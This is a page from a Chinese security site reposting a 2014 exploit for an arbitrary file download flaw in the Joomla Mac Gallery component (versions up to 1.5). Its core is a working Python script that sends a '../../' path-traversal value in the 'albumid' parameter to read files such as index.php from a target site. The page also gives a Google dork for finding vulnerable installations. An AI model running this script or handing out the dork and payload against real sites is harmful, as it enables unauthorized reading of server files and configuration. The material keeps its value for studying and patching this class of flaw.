首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Mac Gallery <= 1.5 Arbitrary File Download Exploit
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-09-23  
######################
  
# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
  
# Exploit Author : Claudio Viviani
  
# Vendor Homepage : https://www.apptha.com
  
  
# Dork Google: inurl:option=com_macgallery
  
# Date : 2014-09-17
  
# Tested on : Windows 7 / Mozilla Firefox
  
#             Linux / Mozilla Firefox
  
# Info:
  
# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
  
# PoC Exploit:
  
  
#"album_id" variable is not sanitized.
  
######################
  
#!/usr/bin/env python
  
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
  
banner = """
   __                      __           ___ ___
  |__.-----.-----.--------|  .---.-.   |   Y   .---.-.----.
  |  |  _  |  _  |        |  |  _  |   |.      |  _  |  __|
  |  |_____|_____|__|__|__|__|___._|   |. \_/  |___._|____|
 |___|                                 |:  |   |
                                       |::.|:. |
                                       `--- ---'
  _______       __ __                      _____    _______
 |   _   .---.-|  |  .-----.----.--.--.   | _   |  |   _   |
 |.  |___|  _  |  |  |  -__|   _|  |  |   |.|   |__|   1___|
 |.  |   |___._|__|__|_____|__| |___  |   `-|.  |__|____   |
 |:  1   |                      |_____|     |:  |  |:  1   |
 |::.. . |                                  |::.|  |::.. . |
 `-------'                                  `---'  `-------'
  
                            j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
  
                        Written by:
  
                      Claudio Viviani
  
                   http://www.homelab.it
  
                      info@homelab.it
                  homelabit@protonmail.ch
  
             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
"""
  
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
  
def connection(url,pathtrav):
    try:
        response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
        content = response.read()
        if content != "":
            print '[!] VULNERABLE'
            print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
        else:
            print '[X] Not Vulnerable'
    except urllib2.HTTPError:
        print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'
  
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
options, remainder = commandList.parse_args()
  
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
  
print(banner)
  
url = checkurl(options.target)
pathtrav = "../../"
  
connection(url,pathtrav)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GetSimpleCMS PHP File Upload
·Joomla Face Gallery 1.0 Multip
·Seafile-server <= 3.1.5 - Remo
·Fast Image Resizer 098 - Local
·Oracle MyOracle Filter Bypass
·xcode-select 13.4.0 Buffer Ove
·seafile-server 3.1.5 Denial Of
·WS10 Data Server SCADA Exploit
·ZTE ZXDSL-931VII Unauthenticat
·ZyXEL Prestig P-660HNU-T1 ISP
·Phpwiki Ploticus Remote Code E
·EMC AlphaStor Device Manager O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved